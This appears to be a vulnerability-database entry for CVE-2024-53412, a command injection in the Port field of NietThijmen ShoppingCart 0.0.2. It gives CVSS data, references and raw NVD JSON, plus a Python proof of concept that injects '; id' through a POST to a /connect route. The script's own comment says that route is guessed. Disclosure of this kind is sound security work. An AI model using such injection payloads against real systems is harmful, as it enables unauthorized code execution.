CVE-2024-53412

Description

Command injection in the connect function in NietThijmen ShoppingCart 0.0.2 allows an attacker to execute arbitrary shell commands and achieve remote code execution via injection of malicious payloads into the Port field

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

NietThijmen ShoppingCart 0.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_cve_2024_53412(target_url):
    """
    Proof of Concept for CVE-2024-53412
    Exploits command injection in the Port field of NietThijmen ShoppingCart.
    """
    # The vulnerable endpoint (adjust based on actual application route)
    endpoint = f"{target_url}/connect"
    
    # Malicious payload to execute 'id' command via shell injection
    # Using a semicolon to chain commands
    payload = "; id"

    # Prepare data with the injected payload in the 'port' field
    data = {
        "host": "127.0.0.1",
        "port": payload
    }

    try:
        print(f"[*] Sending payload to {endpoint}...")
        response = requests.post(endpoint, data=data, timeout=5)
        
        # Check if command execution output is visible in response
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Response content:")
            print(response.text)
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://127.0.0.1:3000"
    exploit_cve_2024_53412(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-53412
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-53412
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-53412/
[4] VulDB https://vuldb.com/cve/CVE-2024-53412
[5] https://github.com/Buckdray/vulnerability-research/blob/main/CVE-2024-53412/README.md
[6] https://github.com/NietThijmen/ShoppingCart/issues/1
[7] https://github.com/Buckdray/vulnerability-research/blob/main/CVE-2024-53412/README.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-53412", "sourceIdentifier": "[email protected]", "published": "2026-04-15T15:16:39.710", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Command injection in the connect function in NietThijmen ShoppingCart 0.0.2 allows an attacker to execute arbitrary shell commands and achieve remote code execution via injection of malicious payloads into the Port field"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://github.com/Buckdray/vulnerability-research/blob/main/CVE-2024-53412/README.md", "source": "[email protected]"}, {"url": "https://github.com/NietThijmen/ShoppingCart/issues/1", "source": "[email protected]"}, {"url": "https://github.com/Buckdray/vulnerability-research/blob/main/CVE-2024-53412/README.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}